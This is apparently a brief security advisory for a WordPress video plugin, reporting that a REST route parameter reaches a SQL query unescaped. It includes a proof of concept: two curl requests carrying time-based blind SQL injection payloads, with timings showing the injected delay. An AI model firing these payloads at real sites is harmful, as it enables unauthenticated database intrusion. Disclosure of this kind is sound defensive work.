Description The plugin does not sanitize and escape a parameter from a REST route before using it in a SQL statement, allowing unauthenticated users to perform SQL injection attacks
% time curl “https://example.com/?rest_route=/h5vp/v1/video/1&id;=1’+OR+(SELECT+1+FROM+(SELECT(SLEEP(5)))xyz)–±” {“code”:“not_found”,“message”:“Data not found”,“data”:{“status”:404}}curl 0.01s user 0.02s system 0% cpu 5.760 total % time curl “https://example.com/?rest_route=/h5vp/v1/video/1&id;=1’+OR+(SELECT+1+FROM+(SELECT(SLEEP(1)))xyz)–±” {“code”:“not_found”,“message”:“Data not found”,“data”:{“status”:404}}curl 0.01s user 0.01s system 1% cpu 1.204 total